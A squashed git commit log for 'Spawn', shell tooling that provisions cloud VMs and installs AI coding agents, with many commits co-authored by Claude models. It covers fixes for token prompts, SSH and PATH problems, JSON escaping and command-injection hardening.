* fix: rewrite hetzner common.sh + fix token prompt bug in shared/common.sh
Hetzner: rewrote from 621 to 224 lines. Removed hcloud CLI dual-path
fallback, server type validation/fallback chain (11 functions), and
duplicate CLI+API implementations. Now API-only like DigitalOcean.
Shared: fixed `echo ""` calls in _prompt_for_api_token, get_openrouter_api_key_manual,
and get_openrouter_api_key_oauth that wrote to stdout instead of stderr.
These functions are called inside $(...) command substitutions, so the
newlines got prepended to the captured token, causing "unable to
authenticate" errors when pasting tokens at the prompt.
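A minimal sketch of the corrected pattern (function and prompt text are illustrative): everything except the token itself goes to stderr, so `$(...)` captures a clean value.

```shell
# Prompt helper sketch: only the token reaches stdout.
_prompt_for_token() {
  echo "" >&2                            # blank line: stderr, not stdout
  printf "Paste your API token: " >&2    # prompt text: stderr too
  local token
  IFS= read -r token
  printf '%s' "$token"                   # captured by token="$(_prompt_for_token)"
}
```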
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: rewrite daytona common.sh — API-only, drop CLI dependency
Rewrote from 312 to 174 lines. Removed daytona CLI dependency in
favor of direct REST API calls. Matches the same API-only pattern
used by Hetzner, DigitalOcean, and other clouds.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: pass SSH port to control master exit in daytona interactive/destroy
The ssh -O exit command to close the multiplexed master was missing
the -p PORT flag when DAYTONA_SSH_PORT is set. This left the master
connection open, causing "mux_client: master did not respond" errors
when the interactive session tried to allocate a PTY.
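The fix can be sketched with a hypothetical helper that builds the master-exit command, threading the port through when it is set:

```shell
# Close the multiplexed master on the same port it was opened on.
close_ssh_master() {
  local host="$1" port="${DAYTONA_SSH_PORT:-}"
  local -a args=(-O exit)
  [ -n "$port" ] && args+=(-p "$port")
  echo ssh "${args[@]}" "$host"   # echoed instead of executed, for illustration
}
```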
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
* feat: add spawn name prompt and project confirmation to GCP flow
Ask for the spawn name upfront (before auth), derive a kebab-case default
for VM naming, and confirm the current GCP project before using it.
New interaction order:
1. Spawn name: "My Dev Box" → kebab "my-dev-box" exported as
GCP_INSTANCE_NAME_KEBAB
2. gcloud auth + project confirm: "Current project: X Keep? [Y/n]"
If no → project picker shown
3. SSH key
4. Machine type picker (existing)
5. Zone picker (existing)
6. Instance name prompt: "Instance name [my-dev-box]: "
User can press Enter to accept or type a custom name
New functions:
_to_kebab_case() — lowercases, replaces non-alnum with hyphens
_gcp_prompt_spawn_name() — prompts for display name, exports kebab default;
honours SPAWN_NAME env var set by CLI (--name flag)
Modified:
_gcp_resolve_project() — adds Y/n confirmation when project already set
get_server_name() — shows kebab default in prompt, accepts Enter
cloud_authenticate() — calls _gcp_prompt_spawn_name first
Co-Authored-By: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
* feat: add spawn name prompt to all clouds via shared/common.sh
Move _to_kebab_case() and prompt_spawn_name() to shared/common.sh so all
clouds get upfront spawn name prompting and kebab-based resource naming.
shared/common.sh:
+ _to_kebab_case() — "My Dev Box" → "my-dev-box"
+ prompt_spawn_name() — asks for display name, exports SPAWN_NAME_DISPLAY
and SPAWN_NAME_KEBAB; skips if already set;
honours SPAWN_NAME env var from CLI --name flag
~ get_resource_name() — replaces silent SPAWN_NAME fallback with a visible
prefilled default: "Enter server name [my-dev-box]: "
Per-cloud changes (cloud_authenticate gains prompt_spawn_name first):
hetzner, fly, aws, daytona, digitalocean, sprite — one-line change each
gcp/lib/common.sh:
- Remove _to_kebab_case() (now in shared)
- Remove _gcp_prompt_spawn_name() (now in shared as prompt_spawn_name)
~ cloud_authenticate: _gcp_prompt_spawn_name → prompt_spawn_name
~ get_server_name: simplified back to get_validated_server_name
(shared get_resource_name now shows the kebab default in the prompt)
Result — every cloud shows this flow upfront:
Spawn name (e.g. "My Dev Box"): My Claude Box
ℹ Resource name: my-claude-box
...
Enter server name [my-claude-box]: ⏎
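A minimal sketch of the kebab-case helper described above (trimming edge hyphens is an added assumption, not stated in the change):

```shell
# "My Dev Box" → "my-dev-box": lowercase, squash non-alphanumerics to hyphens.
_to_kebab_case() {
  printf '%s' "$1" \
    | tr '[:upper:]' '[:lower:]' \
    | sed -E 's/[^a-z0-9]+/-/g; s/^-+|-+$//g'
}
```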
Co-Authored-By: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
* fix: use "Use project '...'?" instead of "Keep this project?" in GCP prompt
Co-Authored-By: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
---------
Co-authored-by: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
* feat: add spawn pick to _display_and_select in shared/common.sh
All clouds using interactive_pick (Hetzner, DigitalOcean, AWS, fly, etc.)
now get the arrow-key picker UI when the user runs via `spawn`.
Placement: between fzf (rarely installed) and numbered list (plain fallback).
Priority: fzf > spawn pick > numbered list.
Pipe-delimited items "id|field2|field3..." are converted to tab-delimited
"id\tid\tfield2 · field3 · ..." so spawn pick displays:
> cx22 2 vCPU · 4.0 GB RAM · 40 GB disk · shared · $ 0.0057/hr
> fsn1 Falkenstein · DE
The --default flag uses default_id when set, otherwise default_value,
so the correct item is pre-selected when the picker opens.
No 2>/dev/tty redirect (avoids the zsh 'file exists' failure that broke
the GCP picker; spawn pick opens /dev/tty internally via fs.openSync).
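The pipe-to-tab conversion can be sketched as (helper name hypothetical):

```shell
# "id|field2|field3" → "id\tid\tfield2 · field3" for spawn pick's display.
_pipe_to_pick_row() {
  local line="$1" id rest
  id="${line%%|*}"             # first field is the id
  rest="${line#*|}"            # remaining fields
  printf '%s\t%s\t%s' "$id" "$id" "${rest//|/ · }"
}
```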
Co-Authored-By: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
* refactor: replace custom _gcp_interactive_pick with shared interactive_pick
- Remove _gcp_interactive_pick (60 lines of custom picker logic)
- Convert option functions to pipe-delimited format (id|detail)
to match what interactive_pick / _display_and_select expect
- Replace _gcp_pick_{machine_type,zone,project} with direct
interactive_pick calls — same pattern as Hetzner
- _gcp_project_options: awk now outputs id|name instead of id\tid\tname
GCP now gets fzf → spawn pick → numbered list for free via the
shared helper, with no cloud-specific picker code.
Co-Authored-By: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
---------
Co-authored-by: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
The json_escape fallback (used when python3 is unavailable) only escaped
backslashes and double quotes, producing invalid JSON when input contained
newlines, tabs, or carriage returns. This could cause JSON injection in
API request bodies sent to cloud providers (Hetzner, DigitalOcean, Fly.io)
and corrupt credential config files.
Add escaping for \n, \r, and \t in the fallback path. The python3 primary
path (json.dumps) was already correct.
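A sketch of the hardened fallback path (the real function may differ in detail; backslashes must be escaped first so later escapes are not doubled):

```shell
# python3-free fallback: escape the characters a JSON string cannot contain raw.
json_escape_fallback() {
  local s="$1"
  s="${s//\\/\\\\}"       # backslash first
  s="${s//\"/\\\"}"       # double quote
  s="${s//$'\n'/\\n}"     # newline
  s="${s//$'\r'/\\r}"     # carriage return
  s="${s//$'\t'/\\t}"     # tab
  printf '"%s"' "$s"
}
```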
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Remove backslash before $ in regex pattern so it anchors to end-of-string
rather than matching a literal dollar sign. This restores proper validation
of OAuth codes (16-128 alphanumeric chars only).
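The corrected validation, sketched:

```shell
# ^...$ anchors both ends; with the old \$ the pattern looked for a
# literal dollar sign instead of anchoring at end-of-string.
is_valid_oauth_code() {
  [[ "$1" =~ ^[A-Za-z0-9]{16,128}$ ]]
}
```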
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
* fix: persist gh auth credentials to disk for interactive sessions
When GITHUB_TOKEN is in the environment, gh auth status returns success
(gh checks env vars first), so ensure_gh_auth() short-circuits before
gh auth login --with-token writes credentials to ~/.config/gh/hosts.yml.
The interactive session starts without GITHUB_TOKEN in env, so gh reports
"not logged into any GitHub hosts".
Fix: always run gh auth login --with-token when GITHUB_TOKEN is set,
persisting credentials to disk regardless of gh auth status.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: unset GITHUB_TOKEN env var before gh auth login --with-token
gh refuses to store credentials when GITHUB_TOKEN is already set in
the environment: "The value of the GITHUB_TOKEN environment variable
is being used for authentication." Save the value, unset the env var,
pipe it to gh auth login, then re-export.
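A sketch of the save/unset/login/re-export dance; the login step is parameterized here, but in the real script it is `gh auth login --with-token`:

```shell
persist_gh_token() {
  local saved="$GITHUB_TOKEN"
  unset GITHUB_TOKEN                # gh refuses to store creds while it's set
  printf '%s\n' "$saved" | "$@"     # pipe the token to the login command
  export GITHUB_TOKEN="$saved"      # restore for the rest of the script
}
```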
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: address security review — validate token format, skip if already persisted
- Add GITHUB_TOKEN format validation (ghp_, gho_, ghu_, ghs_, ghr_, github_pat_)
- Add fast path: check gh auth status with env var unset before persisting
- Document plaintext credential store behavior (standard gh CLI behavior)
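The prefix check can be sketched as (function name hypothetical):

```shell
# Accept only known GitHub token prefixes before piping the value to gh.
looks_like_github_token() {
  case "$1" in
    ghp_*|gho_*|ghu_*|ghs_*|ghr_*|github_pat_*) return 0 ;;
    *) return 1 ;;
  esac
}
```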
Agent: pr-maintainer
Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Codex CLI's OPENAI_BASE_URL env var approach causes "Invalid Responses
API request" errors because OpenRouter doesn't fully support the
Responses API wire format via base URL override. Switch all 8 codex
scripts to use ~/.codex/config.toml with model_provider="openrouter"
which uses the native OpenRouter integration.
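A sketch of the switch from the env var to a config file; only the `model_provider` key and the `~/.codex/config.toml` path are confirmed by this change, the helper is illustrative:

```shell
write_codex_config() {
  local path="$1"
  mkdir -p "$(dirname "$path")"
  printf 'model_provider = "openrouter"\n' > "$path"
}
# usage: write_codex_config "$HOME/.codex/config.toml"
```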
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Release assets use x64 not x86_64 (opencode-linux-x64.tar.gz) and
darwin not mac (opencode-darwin-arm64.tar.gz). The arch mapping only
handled aarch64→arm64 but missed x86_64→x64, causing 404 on all
x86_64 servers.
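The completed mapping, sketched (function name hypothetical):

```shell
# Map `uname -m` output to the names used in release asset filenames.
map_asset_arch() {
  case "$1" in
    x86_64)        echo x64 ;;
    aarch64|arm64) echo arm64 ;;
    *)             echo "$1" ;;
  esac
}
```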
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
* fix: sprite npm PATH resolution and gateway timeout
Sprites use nvm-managed node, so npm global bin is at
/.sprite/languages/node/nvm/.../bin/ which isn't in default PATH.
Dynamically resolve $(npm prefix -g)/bin in install, launch, and
gateway commands for all sprite agents.
Also increase openclaw gateway timeout from 30s to 60s — gateway
starts slowly on sprites but TUI connects once ready.
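The dynamic resolution can be sketched as (helper name hypothetical):

```shell
# Resolve the npm global bin dir at run time instead of hardcoding the nvm path.
npm_global_bin() {
  printf '%s/bin\n' "$(npm prefix -g)"
}
# usage: export PATH="$(npm_global_bin):$PATH"
```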
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: add opencode bin dir to PATH in sprite launch command
OpenCode installs to $HOME/.opencode/bin/ which isn't in the sprite's
default PATH or the npm prefix path.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
* fix: pass -o org flag to all sprite CLI commands
sprite create/exec/list/destroy fail with "authentication failed" when
the org isn't passed explicitly. Detect the selected org after login and
thread it through all sprite commands via _sprite_org_flags().
Also fix ensure_sprite_authenticated to fail loudly instead of
swallowing errors with || true.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: sprite scripts fail when zsh is not available
setup_shell_environment overwrites .bashrc with `exec zsh`, but sprites
don't have zsh installed. This breaks PATH and causes all agent launch
commands that source .zshrc to fail.
- Only switch to zsh if it's actually available on the sprite
- Replace `source ~/.zshrc` with explicit PATH in all sprite agent
launch commands (openclaw, opencode, codex, kilocode)
- Fix start_openclaw_gateway to use explicit PATH instead of .zshrc
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: openclaw not found on sprite — bashrc corruption from prior runs
On reused sprites, .bashrc still has `exec /usr/bin/zsh -l` from a prior
run. Sourcing it in the install command causes `&&` to short-circuit, so
`bun install -g openclaw` never runs.
- Clean up stale `exec zsh` lines from .bashrc at start of
setup_shell_environment (fixes reused sprites)
- Use explicit PATH in openclaw install command instead of relying on
.bashrc
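The cleanup step can be sketched as a filter (the real code edits the remote file in place):

```shell
# Drop stale `exec ... zsh` lines left in .bashrc by prior runs.
clean_bashrc() {
  sed '/exec .*zsh/d' "$1"
}
```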
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: use npm instead of bun for openclaw install on sprite
bun 1.3.9 on sprites fails with "connection closed" during dependency
resolution. Other sprite agents (codex, kilocode) already use npm
successfully.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: openclaw install — npm+bun fallback, verify binary exists
Try npm first (more reliable on sprites), fall back to bun, then verify
the binary is actually in PATH before continuing.
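The pattern, sketched with the installer commands parameterized (in the real script they are `npm install -g openclaw` and the bun equivalent):

```shell
# Try installers in order, then verify the binary is actually reachable.
install_with_fallback() {
  local bin="$1"; shift
  local installer
  for installer in "$@"; do
    if eval "$installer"; then break; fi
  done
  command -v "$bin" >/dev/null 2>&1
}
```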
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: persist npm global bin path to .spawnrc on sprites
npm installs openclaw successfully but its global bin dir isn't in the
sprite's default PATH. Detect the npm bin path after install, write it
to .spawnrc so gateway and launch commands (which source .spawnrc) find
the binary.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Point OpenClaw to https://github.com/openclaw/openclaw and OpenCode to
https://github.com/anomalyco/opencode. Update the OpenCode install command
and binary download URL to match the new repo.
Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
These 5 agents are being dropped from the Spawn matrix. This removes
45 agent scripts across 9 clouds, cleans the manifest, test fixtures,
READMEs, CLI source, and shared library comments.
Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
PR #1462 removed duplicate get_or_prompt_api_key and get_model_id_interactive
calls in spawn_agent(). PR #1468 accidentally re-introduced them with incorrect
step numbering (two "4"s and two "5"s). This doubled API validation requests on
every deployment across all 130+ agent scripts.
Also fix OVH cloud_provision not exporting OVH_SERVER_NAME, causing
save_vm_connection to record an empty server name when the user types the name
at the interactive prompt instead of passing it via env var.
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
save_vm_connection built JSON via direct string interpolation, which
produces malformed output if any value contains quotes, backslashes,
or other JSON-special characters. This breaks spawn list/delete/history.
Changes:
- Use json_escape for all string fields in save_vm_connection
- Use json_escape for GCP zone/project metadata values
- Switch AWS, GCP, Daytona get_server_name to get_validated_server_name
for consistency with Hetzner, DigitalOcean, Fly, OVH
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
* docs: add spawn delete command to README
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: harden openclaw across all clouds — validation, reliability, performance
Fixes multiple issues causing openclaw to break on most clouds:
Bugs fixed:
- Double-prefixed model ID (openrouter/openrouter/auto) in config generation
- AWS gateway starting without env vars (missing .zshrc source)
- DigitalOcean sourcing .spawnrc instead of .zshrc for gateway
- Destructive rm -rf ~/.openclaw on re-runs (now mkdir -p)
Validation added:
- API key checked against OpenRouter /auth/key endpoint with re-prompt on failure
- Model ID verified against OpenRouter model list with re-prompt loop
- openrouter/auto and openrouter/free bypass model check
Reliability improvements:
- Standardized gateway launch with </dev/null & disown across all 9 clouds
- Gateway log auto-displayed on startup timeout for diagnostics
- 2GB swap added to cloud-init to prevent OOM on small VMs
- Portable install timeout (10 min) with macOS gtimeout fallback
Performance:
- Reordered spawn_agent: OAuth runs while VM provisions (saves 30-60s)
- Fly.io: bumped to 2GB RAM + 2 shared CPUs for openclaw
- Fly.io: tries bun first (faster), falls back to npm
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: skip sudo in gh install when running as root (Fly.io containers)
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: address PR review — skip validation in tests, quote escaped cmd, escape model_id
- verify_openrouter_key and verify_openrouter_model skip network calls when
SPAWN_SKIP_API_VALIDATION, BUN_ENV=test, or NODE_ENV=test is set
- install_agent timeout wrapper now quotes the escaped command for defense in depth
- model_id in openclaw JSON now uses json_escape() for consistency
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: remove double-escaping in install_agent that broke shell operators
install_agent() was wrapping commands with printf '%q' + bash -c before
passing them to the run callback. But run callbacks (run_server, run_sprite,
ssh_run_server) already handle escaping for remote transport. The double-
escaping turned && || > | into literal characters, causing 'source' to
treat the entire command as a single filename.
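A minimal reproduction of the bug: the transport (stand-in `run_remote`) already supplies a shell layer, so pre-escaping with `printf '%q'` makes the whole command parse as a single word on the remote side.

```shell
run_remote() { bash -c "$1"; }        # stands in for ssh_run_server etc.

cmd='echo a && echo b'
run_remote "$cmd"                     # correct: prints "a" then "b"

pre_escaped=$(printf '%q' "$cmd")     # echo\ a\ \&\&\ echo\ b
run_remote "$pre_escaped" 2>/dev/null \
  || echo "fails: whole string treated as one command name"
```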
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: use local github-auth.sh instead of curling from main
When running from a local checkout, base64-encode the local
github-auth.sh and send it inline to the remote machine. This
ensures fixes (like the sudo skip for root) take effect immediately
without waiting for a merge to main.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: handle github-auth errors gracefully instead of terminating
GitHub CLI setup is optional — failures should not abort the spawn
session. Guard both run_callback calls in offer_github_auth with
|| log_warn so the script continues even if gh install fails.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: use GOOGLE_GEMINI_BASE_URL to route Gemini CLI through OpenRouter
Gemini CLI ignores OPENAI_BASE_URL — it uses GEMINI_API_KEY to talk
directly to Google's API. The OpenRouter key is not a valid Google
API key, so all requests fail with "API key not valid".
Use GOOGLE_GEMINI_BASE_URL to redirect Gemini CLI to OpenRouter's
endpoint. Fixes all 9 cloud gemini scripts + manifest.json.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: guard optional spawn_agent hooks so failures don't kill the session
With set -eo pipefail, any unguarded failure terminates the script.
Several optional operations in spawn_agent were unguarded:
- agent_configure: config file uploads (agent works with defaults)
- agent_save_connection: convenience JSON for spawn list
- agent_pre_launch: gateway daemons, startup hooks
- agent_pre_provision: pre-provision prompts
- .spawnrc shell hooks: hooking env vars into .bashrc/.zshrc
These now log warnings and continue instead of aborting. Critical
steps (cloud_authenticate, agent_install, cloud_provision) still
exit on failure.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: audit and fix env vars, escaping, and error handling across all agents
Audit findings from 3 parallel agents, fixes applied:
**Env vars (4 agents fixed across 9 clouds each = 36 scripts):**
- Amazon Q: remove fake OPENAI_* vars (Q uses AWS auth, can't use OpenRouter)
- Cline: replace OPENAI_* env vars with `cline auth -p openrouter` command
- Open Interpreter: drop OPENAI_* vars, use only OPENROUTER_API_KEY (native support via --model flag)
- NanoClaw: add ANTHROPIC_BASE_URL to .env file (was missing, requests went to Anthropic directly)
**Escaping:**
- execute_agent_non_interactive: replace printf '%q' with single-quote wrapping to avoid double-escaping on Fly.io
**Manifest updated** for amazonq, cline, interpreter entries.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: use setsid to detach openclaw gateway daemon from SSH sessions
The gateway daemon launch (`nohup openclaw gateway ... & disown`) hangs
on all clouds because SSH/exec channels wait for child FDs to close.
setsid creates a new session, fully detaching the daemon so the channel
can close immediately. Falls back to nohup where setsid is unavailable.
Consolidates the daemon launch into a shared start_openclaw_gateway()
function used by all 9 cloud scripts.
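A sketch of the detach pattern (function name and log path illustrative): setsid starts the daemon in a new session so the SSH exec channel's FDs close at once, with nohup as the fallback.

```shell
start_detached() {
  local log="$HOME/.gateway.log"
  if command -v setsid >/dev/null 2>&1; then
    setsid "$@" </dev/null >>"$log" 2>&1 &
  else
    nohup "$@" </dev/null >>"$log" 2>&1 &
  fi
  disown 2>/dev/null || true
}
```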
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: configure npm global prefix for non-root clouds (AWS, GCP, OVH)
AWS Lightsail, GCP, and OVH SSH as non-root users (ubuntu/login user),
so `npm install -g` fails with EACCES on /usr/local/lib/node_modules/.
Fix: configure npm prefix to ~/.npm-global during cloud-init/setup and
add ~/.npm-global/bin to the SSH PATH prefix so agent install commands
find globally-installed npm binaries without sudo.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: remove broken OpenRouter routing from Gemini CLI scripts
Gemini CLI uses Google's native API format (/v1beta/models/:streamGenerateContent),
not the OpenAI-compatible format (/v1/chat/completions). No base URL override can
bridge this — the request formats are fundamentally incompatible. Same situation
as Amazon Q (uses vendor-specific auth/API).
Removed GEMINI_API_KEY and GOOGLE_GEMINI_BASE_URL from all 9 scripts + manifest.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: auto-install AWS CLI and gcloud SDK when missing
Instead of printing manual install instructions and exiting, both CLIs
now auto-install:
- AWS: downloads official .pkg (macOS) or .zip (Linux) installer
- GCP: uses brew cask on macOS, Google's tarball installer on Linux
Falls back to manual instructions if auto-install fails.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: nanoclaw — install Docker on Linux, fix hardcoded /root/ path
Two issues broke NanoClaw on all clouds:
1. .env upload hardcoded /root/nanoclaw/.env — fails on non-root clouds
(AWS=ubuntu, GCP=user, OVH=ubuntu). Now uses upload_config_file with
$HOME which expands on the remote side.
2. NanoClaw requires a container runtime. On Linux it uses Docker, but
Docker was never installed. Added Docker install via get.docker.com
to all cloud scripts (with sudo where SSH user is non-root).
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: address security review findings from PR #1463
- Reject symlinked github-auth.sh before base64-encoding (falls back to remote URL)
- Hide API key from process list using curl -K - instead of -H in verify_openrouter_key
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: quote OPENROUTER_API_KEY in cline auth to prevent command injection
Unquoted variable in `cline auth -p openrouter -k ${OPENROUTER_API_KEY}`
allows shell metacharacters in the key to execute arbitrary commands on
the remote server. Wrapping in escaped double quotes prevents expansion.
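The quoting can be sketched as a command builder (helper name hypothetical; embedded quotes in the key are escaped so they cannot break out of the quoting):

```shell
build_cline_auth_cmd() {
  printf 'cline auth -p openrouter -k "%s"' "${1//\"/\\\"}"
}
```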
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Steps 3-4 (get_or_prompt_api_key and model selection) were executed
twice in spawn_agent() -- once before provisioning and once after.
This caused redundant HTTP validation calls to openrouter.ai/api for
every agent deployment (~130+ scripts use spawn_agent). The duplicate
step numbering in comments (3,4,5 then 4,5,6) confirms this was
accidental.
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Fixes GitHub CLI authentication on remote VMs by passing the local token through to the remote installation script. Uses printf '%q' for safe shell escaping to prevent command injection.
Move OpenRouter OAuth and model selection prompts to run BEFORE
server provisioning in spawn_agent(). Previously the user had to
wait for the server to spin up before being prompted for their
API key and model choice. Now all interactive prompts (GitHub auth,
OpenRouter OAuth, model selection) happen upfront, then the server
provisions without further user interaction.
Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
1. _multi_creds_validate referenced undefined help_url variable, causing
empty "Get new credentials from: " error messages when OVH credential
validation fails. Added help_url as parameter and pass it from caller.
2. _spawn_inject_env_vars (used by 130+ agent scripts via spawn_agent)
uploaded credentials to static /tmp/env_config path. The older
inject_env_vars_ssh/inject_env_vars_cb functions document this as a
symlink attack vector and use randomized paths. Fixed to match.
3. Removed dead inject_env_vars_fly and inject_env_vars_sprite functions
(all agent scripts now use spawn_agent -> _spawn_inject_env_vars).
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
* fix: use uv --upgrade to ensure Python 3.13-compatible Pillow across all clouds
aider-chat on Python 3.13 fails with `ImportError: cannot import name
'_imaging' from 'PIL'` when an old Pillow version (pre-10.4) is resolved
— those releases have no Python 3.13 binary wheels, so the C extension
is missing at runtime.
Replace `--with 'Pillow>=10.2.0'` (which was silently broken — the `>`
and single quotes get mangled by `printf '%q'` in run_server before the
command reaches the remote machine) with `--upgrade`, which forces all
transitive deps including Pillow to their latest compatible versions.
Also adds a plain-text echo before the install so users see progress
instead of a silent hang during the 2-4 minute install.
Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
* test: update aider/gptme/interpreter assertions from pip to uv
The install method for aider, gptme, and open-interpreter was changed
from pip to `uv tool install` across all clouds. The mock test
assertions still checked for the old `pip.*install.*` patterns, causing
9 failures (3 agents × 3 clouds).
Update patterns to match the actual `uv tool install` commands now used
in all cloud scripts.
Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
* ci: trigger test run for uv assertion fix
* fix: prevent SSH hangs, restore stderr, fix command escaping across clouds
- Add < /dev/null to ssh_run_server and generic_ssh_wait to prevent SSH
stdin theft causing sequential install/verify/configure steps to hang
- Add ServerAliveInterval, ServerAliveCountMax, ConnectTimeout to default
SSH_OPTS so long-running installs don't silently drop on flaky networks
- Remove 2>/dev/null from Fly.io run_server so remote command errors are
no longer silently swallowed (--quiet flag still suppresses flyctl noise)
- Fix Fly.io printf '%q' double-quoting: remove extra quotes around
$escaped_cmd that prevented the remote shell from consuming escapes,
breaking && || | operators in commands
- Remove broken printf '%q' from Daytona run_server and interactive_session
where it escaped shell operators into literal characters since daytona exec
has no intermediate shell layer
- Pin aider to --python 3.12 instead of --with audioop-lts across all clouds
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: add --pty to fly ssh console for interactive sessions
fly ssh console -C does not allocate a pseudo-terminal by default,
causing interactive TUI agents (aider, claude) to fail with
"Input is not a terminal (fd=0)" or completely unresponsive input.
Adding --pty forces PTY allocation, matching how other clouds handle
interactive sessions (SSH uses -t, Sprite uses -tty).
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: prepend ~/.local/bin to PATH in ssh_run_server
After uv installs to ~/.local/bin, the current shell session doesn't
have it in PATH, causing "uv: command not found" on DigitalOcean and
all other SSH-based clouds (Hetzner, AWS, GCP, OVH).
Fly.io's run_server already prepends this PATH — now the shared
ssh_run_server does the same, fixing all SSH-based clouds at once.
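The idea can be sketched like this (ssh replaced with a local `bash -c` so the sketch is self-contained; the real function wraps `ssh` the same way):

```shell
# Single-quoted so $HOME and $PATH expand on the remote side, not locally.
path_prefix='export PATH="$HOME/.local/bin:$PATH"; '

run_remote() {
  # real version: ssh "$SERVER_IP" "${path_prefix}$1" < /dev/null
  bash -c "${path_prefix}$1"
}

run_remote 'case ":$PATH:" in *".local/bin:"*) echo "uv reachable" ;; esac'
```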
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: add Node.js to cloud-init for all cloud providers
npm-based agents (codex, kilocode, etc.) fail with "npm: command not
found" because Node.js isn't installed during cloud-init. Fly.io was
the only provider installing Node.js (in wait_for_cloud_init).
Now all cloud-init scripts install Node.js v22 LTS from nodesource,
matching Fly.io's setup. Also adds ~/.local/bin to PATH in AWS and
GCP cloud-init (was already in shared/DigitalOcean/Hetzner).
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: use apt packages for nodejs/npm instead of nodesource
The nodesource setup script (setup_22.x) runs its own apt-get update
and repository configuration, nearly doubling cloud-init time and
causing hangs on DigitalOcean. Ubuntu 24.04 includes nodejs and npm
in its default repos — just add them to the packages list.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: add timeouts and better error handling to Daytona CLI commands
Daytona CLI commands (login, list, create) can hang indefinitely when
the API is slow or unreachable. This causes:
- "Failed to create sandbox: timeout" with no recovery
- Token validation timeouts misreported as "invalid token"
- Users re-entering valid tokens that also timeout
Fixes:
- Wrap all daytona CLI calls with timeout (30s for auth, 120s for create)
- Detect timeout errors separately from auth errors
- Show actionable "try again / check status" messages for timeouts
- Add nodejs/npm to Daytona wait_for_cloud_init
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: set DAYTONA_API_URL to Daytona Cloud by default
The Daytona CLI may default to connecting to a local self-hosted
server instead of Daytona Cloud. Without DAYTONA_API_URL set to
https://app.daytona.io/api, every CLI command (login, list, create)
hangs trying to reach a non-existent local server and times out.
The SDK documents this as the default, but the CLI doesn't always
pick it up — now we export it explicitly.
